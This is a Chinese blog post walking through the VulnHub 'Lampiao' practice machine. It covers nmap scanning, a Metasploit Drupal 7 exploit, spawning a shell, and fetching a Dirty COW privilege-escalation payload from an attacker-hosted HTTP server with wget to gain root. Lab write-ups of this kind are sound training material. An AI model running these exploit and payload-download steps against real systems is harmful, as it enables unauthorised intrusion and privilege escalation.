freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

lampiao打靶思路详解(vulnhub)
CMing 2024-03-12 19:58:40 23298

第一步:信息收集

nmap -sn 192.168.31.0/24

image

确定靶机IP为192.168.31.116

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.116

结果如下

image

第二步:WEB渗透

访问http://192.168.31.116/

image

发现什么都没有

然后访问http://192.168.31.116:1898

image

通过插件可以发现是 Drupal CMS 版本为 7.x

搜索

searchsploit drupal |grep 7.

image

我的天哪!这个CMS爆出过不少漏洞(手动狗头)

那就启动msf,因为msf里面集成了很多漏洞

msfconsole

search drupal

image

然后就是挨个尝试了

在我使用到第二个的时候,成功了

use 1

show options

set RHOSTS 192.168.31.116

set RPORT 1898

run

image

第三步:后渗透

直接通过msf进行后渗透

进入交互环境

shell

然后用python增强交互环境

python -c "import pty;pty.spawn('/bin/bash')"

查看用户

id

查看环境,看看能不能用脏牛进行提权

uname -a

g++ -v

image

感觉差不多,那就上脏牛!!!

本机启动python http服务

python -m http.server 8000

image

下载playload

wget http://192.168.31.178:8000/dcow.cpp

wget http://192.168.31.178:8000/makefile

然后编译,执行

make

./dcow

image

成功!!!

之后就简单了

进入root目录。获得flag

image

至此完结,撒花。

# 网络安全
本文为 CMing 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
CMing LV.4
这家伙太懒了,还未填写个人描述!
  • 9 文章数
  • 2 关注者
DC-3打靶思路详解(vulnhub)
2024-03-30
DC-2打靶思路详解(vulnhub)
2024-03-26
DC-1打靶思路详解(vulnhub)
2024-03-19
文章目录